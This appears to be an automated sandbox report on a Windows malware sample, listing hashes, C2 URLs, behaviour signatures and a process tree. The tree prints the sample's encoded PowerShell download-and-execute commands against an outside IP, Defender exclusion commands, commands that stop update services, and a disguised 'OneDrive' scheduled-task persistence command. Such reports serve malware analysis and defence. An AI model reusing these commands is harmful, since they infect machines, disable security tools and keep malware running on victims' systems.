Analysis
- max time kernel: 112s
- max time network: 135s
- platform: windows7_x64
- resource: win7-20230220-en
- resource tags: arch:x64, arch:x86, image:win7-20230220-en, locale:en-us, os:windows7-x64, system
- submitted: 12/05/2023, 15:26
Static task: static1
Behavioral task: behavioral1
- Sample: file.exe
- Resource: win7-20230220-en
Behavioral task: behavioral2
- Sample: file.exe
- Resource: win10v2004-20230220-en
General
- Target: file.exe
- Size: 76KB
- MD5: 1deaa9be17e8122d78a470f44a58300a
- SHA1: 984147abf4e9f173eb233e0949d76e45dd77ef8a
- SHA256: 712f4d08ad4db1fb658d8206cee6a00f4024fd4ef5de8de0dfbe0d98779f9f86
- SHA512: 9a522a03887c38b16d7a34a08f3e9f4aded39066fc852575659b4320f5bb7e51693e7d5ca1715a6d67118fa7340d97309e5bf5869e2aa2ab63b7f0fed4fa10de
- SSDEEP: 1536:zcr6SNQrsMB3xVyalA9XbLxEC58dHPonAXBbKaAE2UHu90+E:FSNsJ/Vyaald+dQnAXBbKaAE2UH/+E
Malware Config
Extracted URLs:
- http://62.204.41.23/o.png
- http://62.204.41.23/file.png
- http://62.204.41.23/r.png
Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 12 IoCs
description | pid | Process | procid_target
PID 1148 created 1248 | 1148 | OneDrive.exe | 14
PID 1148 created 1248 | 1148 | OneDrive.exe | 14
PID 1148 created 1248 | 1148 | OneDrive.exe | 14
PID 1148 created 1248 | 1148 | OneDrive.exe | 14
PID 1148 created 1248 | 1148 | OneDrive.exe | 14
PID 1148 created 1248 | 1148 | OneDrive.exe | 14
PID 1856 created 1248 | 1856 | OneDrive.exe | 14
PID 1856 created 1248 | 1856 | OneDrive.exe | 14
PID 1856 created 1248 | 1856 | OneDrive.exe | 14
PID 1856 created 1248 | 1856 | OneDrive.exe | 14
PID 1856 created 1248 | 1856 | OneDrive.exe | 14
PID 1856 created 1248 | 1856 | OneDrive.exe | 14

Blocklisted process makes network request 5 IoCs
flow | pid | Process
5 | 676 | powershell.exe
6 | 776 | powershell.exe
7 | 240 | powershell.exe
10 | 776 | powershell.exe
11 | 776 | powershell.exe

Downloads MZ/PE file

Sets service image path in registry 2 TTPs 1 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinRing0_1_2_0\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Roaming\\Google\\Libs\\WR64.sys" | services.exe

Stops running service(s) 3 TTPs

Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | OneDrive.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | OneDrive.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | OneDrive.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | OneDrive.exe

Executes dropped EXE 2 IoCs
pid | Process
1148 | OneDrive.exe
1856 | OneDrive.exe

Loads dropped DLL 2 IoCs
pid | Process
776 | powershell.exe
1944 | taskeng.exe

Drops file in System32 directory 5 IoCs
description | ioc | Process
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | C:\Windows\System32\Tasks\OneDrive | svchost.exe

Suspicious use of SetThreadContext 3 IoCs
description | pid | Process | procid_target
PID 1148 set thread context of 1760 | 1148 | OneDrive.exe | 48
PID 1856 set thread context of 1964 | 1856 | OneDrive.exe | 72
PID 1856 set thread context of 1260 | 1856 | OneDrive.exe | 79

Launches sc.exe 10 IoCs
Sc.exe is a Windows utility to control services on the system.
pid | Process
1756 | sc.exe
1976 | sc.exe
376 | sc.exe
1964 | sc.exe
1964 | sc.exe
456 | sc.exe
1684 | sc.exe
884 | sc.exe
1056 | sc.exe
988 | sc.exe

Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | wmiprvse.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | wmiprvse.exe
Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | wmiprvse.exe
Key security queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information | wmiprvse.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
1548 | schtasks.exe
316 | schtasks.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid | Process
1248 | Explorer.EXE

Suspicious behavior: LoadsDriver 1 IoCs
pid | Process
464 | services.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of FindShellTrayWindow 21 IoCs
Suspicious use of SendNotifyMessage 21 IoCs
Suspicious use of WriteProcessMemory 64 IoCs
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes

The tree below lists each process as "path (PID)", followed by its command line, the signatures it triggered, and its child processes indented beneath it. Where a PowerShell command line used -enc, the decoded UTF-16LE argument is noted after it.

- C:\Windows\system32\lsass.exe (PID 480)
  cmd: C:\Windows\system32\lsass.exe

- C:\Windows\system32\services.exe (PID 464)
  cmd: C:\Windows\system32\services.exe
  signatures: Sets service image path in registry; Suspicious behavior: LoadsDriver; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\svchost.exe (PID 968)
    cmd: C:\Windows\system32\svchost.exe -k LocalService
  - C:\Windows\system32\svchost.exe (PID 2016)
    cmd: C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
  - C:\Windows\system32\sppsvc.exe (PID 1100)
    cmd: C:\Windows\system32\sppsvc.exe
  - C:\Windows\system32\taskhost.exe (PID 1116)
    cmd: "taskhost.exe"
  - C:\Windows\system32\svchost.exe (PID 1040)
    cmd: C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
  - C:\Windows\System32\spoolsv.exe (PID 484)
    cmd: C:\Windows\System32\spoolsv.exe
  - C:\Windows\system32\svchost.exe (PID 284)
    cmd: C:\Windows\system32\svchost.exe -k NetworkService
  - C:\Windows\system32\svchost.exe (PID 860)
    cmd: C:\Windows\system32\svchost.exe -k netsvcs
    signatures: Drops file in System32 directory; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\system32\taskeng.exe (PID 1944)
      cmd: taskeng.exe {33506574-CF87-425E-9B2F-101BB9F34570} S-1-5-21-2647223082-2067913677-935928954-1000:BPOQNXYB\Admin:Interactive:[1]
      signatures: Loads dropped DLL; Suspicious use of WriteProcessMemory
      - C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe (PID 1856)
        cmd: C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
        signatures: Suspicious use of NtCreateUserProcessOtherParentProcess; Checks BIOS information in registry; Executes dropped EXE; Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses
  - C:\Windows\System32\svchost.exe (PID 816)
    cmd: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
  - C:\Windows\System32\svchost.exe (PID 764)
    cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
  - C:\Windows\system32\svchost.exe (PID 680)
    cmd: C:\Windows\system32\svchost.exe -k RPCSS
  - C:\Windows\system32\svchost.exe (PID 604)
    cmd: C:\Windows\system32\svchost.exe -k DcomLaunch
    - C:\Windows\system32\wbem\wmiprvse.exe (PID 2020)
      cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
      signatures: Checks processor information in registry

- C:\Windows\system32\winlogon.exe (PID 420)
  cmd: winlogon.exe

- C:\Windows\system32\lsm.exe (PID 488)
  cmd: C:\Windows\system32\lsm.exe

- \\?\C:\Windows\system32\wbem\WMIADAP.EXE (PID 1540)
  cmd: wmiadap.exe /F /T /R

- C:\Windows\Explorer.EXE (PID 1248)
  cmd: C:\Windows\Explorer.EXE
  signatures: Suspicious behavior: GetForegroundWindowSpam
  - C:\Users\Admin\AppData\Local\Temp\file.exe (PID 1096)
    cmd: "C:\Users\Admin\AppData\Local\Temp\file.exe"
    signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1760)
      cmd: "powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwA
      decoded: " Add-MpPreference -ExclusionPath C:\" (excludes the whole system drive from Defender scanning)
      signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 240)
      cmd: "powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBvAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==
      decoded: reassembles (New-Object Net.WebClient).DownloadString('http://62.204.41.23/o.png') from three string fragments, evaluates it with a backtick-obfuscated IEX and pipes the downloaded content into a second IEX
      signatures: Blocklisted process makes network request; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 776)
      cmd: "powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBmAGkAbABlAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==
      decoded: same construction as PID 240, fetching http://62.204.41.23/file.png
      signatures: Blocklisted process makes network request; Loads dropped DLL; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
      - C:\Users\Admin\AppData\Roaming\OneDrive.exe (PID 1148)
        cmd: "C:\Users\Admin\AppData\Roaming\OneDrive.exe"
        signatures: Suspicious use of NtCreateUserProcessOtherParentProcess; Checks BIOS information in registry; Executes dropped EXE; Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 676)
      cmd: "powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwByAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==
      decoded: same construction as PID 240, fetching http://62.204.41.23/r.png
      signatures: Blocklisted process makes network request; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 808)
    cmd: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    signatures: Drops file in System32 directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\cmd.exe (PID 1868)
    cmd: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
    signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\System32\sc.exe (PID 1056)
      cmd: sc stop UsoSvc
      signatures: Launches sc.exe
    - C:\Windows\System32\sc.exe (PID 1976)
      cmd: sc stop WaaSMedicSvc
      signatures: Launches sc.exe
    - C:\Windows\System32\sc.exe (PID 988)
      cmd: sc stop wuauserv
      signatures: Launches sc.exe
    - C:\Windows\System32\sc.exe (PID 1964)
      cmd: sc stop bits
      signatures: Launches sc.exe
    - C:\Windows\System32\sc.exe (PID 376)
      cmd: sc stop dosvc
      signatures: Launches sc.exe
  - C:\Windows\System32\cmd.exe (PID 1980)
    cmd: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\System32\powercfg.exe (PID 1204)
      cmd: powercfg /x -hibernate-timeout-ac 0
      signatures: Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\powercfg.exe (PID 1936)
      cmd: powercfg /x -hibernate-timeout-dc 0
      signatures: Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\powercfg.exe (PID 872)
      cmd: powercfg /x -standby-timeout-ac 0
      signatures: Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\powercfg.exe (PID 692)
      cmd: powercfg /x -standby-timeout-dc 0
      signatures: Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\dialer.exe (PID 1760)
    cmd: C:\Windows\System32\dialer.exe
    signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1472)
    cmd: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#huakaggax#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }
    signatures: Drops file in System32 directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - C:\Windows\system32\schtasks.exe (PID 1548)
      cmd: "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn OneDrive /tr 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe'
      signatures: Creates scheduled task(s)
  - C:\Windows\System32\schtasks.exe (PID 1284)
    cmd: C:\Windows\System32\schtasks.exe /run /tn "OneDrive"
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1172)
    cmd: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    signatures: Drops file in System32 directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\cmd.exe (PID 1680)
    cmd: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
    signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\System32\sc.exe (PID 1964)
      cmd: sc stop UsoSvc
      signatures: Launches sc.exe
    - C:\Windows\System32\sc.exe (PID 456)
      cmd: sc stop WaaSMedicSvc
      signatures: Launches sc.exe
    - C:\Windows\System32\sc.exe (PID 1756)
      cmd: sc stop wuauserv
      signatures: Launches sc.exe
    - C:\Windows\System32\sc.exe (PID 1684)
      cmd: sc stop bits
      signatures: Launches sc.exe
    - C:\Windows\System32\sc.exe (PID 884)
      cmd: sc stop dosvc
      signatures: Launches sc.exe
  - C:\Windows\System32\cmd.exe (PID 1416)
    cmd: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    - C:\Windows\System32\powercfg.exe (PID 1868)
      cmd: powercfg /x -hibernate-timeout-ac 0
      signatures: Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\powercfg.exe (PID 432)
      cmd: powercfg /x -hibernate-timeout-dc 0
      signatures: Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\powercfg.exe (PID 1812)
      cmd: powercfg /x -standby-timeout-ac 0
      signatures: Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\powercfg.exe (PID 1160)
      cmd: powercfg /x -standby-timeout-dc 0
      signatures: Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\dialer.exe (PID 1964)
    cmd: C:\Windows\System32\dialer.exe
    signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1784)
    cmd: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#huakaggax#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }
    signatures: Drops file in System32 directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\system32\schtasks.exe (PID 316)
      cmd: "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn OneDrive /tr 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe'
      signatures: Creates scheduled task(s)
  - C:\Windows\System32\dialer.exe (PID 1260)
    cmd: C:\Windows\System32\dialer.exe
    signatures: Suspicious use of AdjustPrivilegeToken; Suspicious use of FindShellTrayWindow; Suspicious use of SendNotifyMessage

- C:\Windows\system32\Dwm.exe (PID 1208)
  cmd: "C:\Windows\system32\Dwm.exe"
Downloads

- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: 28ff6d155581c169e25af9199d483f1a
  SHA1: befef7c7f5cdc3823e5e5790034e4654cbf7f203
  SHA256: 5511d6e9ebf3a93412bb8aad521c7b6d21715d17ee36b719d946338cd973f026
  SHA512: 9e3acbda5fab0ff6e86fd0a7259d912b294b69cf3c44796a1d8dca42cfeae953cfb1ff59d60522359e5a7765d4aca05744ba824cb790efd67234a353f4dcda5a

- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9A2FFPH8S8UEW6KXJPK3.temp
  Filesize: 7KB
  MD5: 28ff6d155581c169e25af9199d483f1a
  SHA1: befef7c7f5cdc3823e5e5790034e4654cbf7f203
  SHA256: 5511d6e9ebf3a93412bb8aad521c7b6d21715d17ee36b719d946338cd973f026
  SHA512: 9e3acbda5fab0ff6e86fd0a7259d912b294b69cf3c44796a1d8dca42cfeae953cfb1ff59d60522359e5a7765d4aca05744ba824cb790efd67234a353f4dcda5a

- (path not recorded in the report)
  Filesize: 8.6MB
  MD5: 546bd4f906d07e78c3167428c09ecb4f
  SHA1: f3ed2616a9630f83922e1b4a07bc8251e23530c4
  SHA256: 06e2a779b34fbd168fb85d4ee1331967a87187fa810bd3739f96bb9222869ad4
  SHA512: 066b3348b02a20d9dcffeadb322d3e9d726b59d1a93101adebc23edb008108782cf699846d7d874c17f45fdf60c17a021b21b77264022a0f2bc943b02575cd82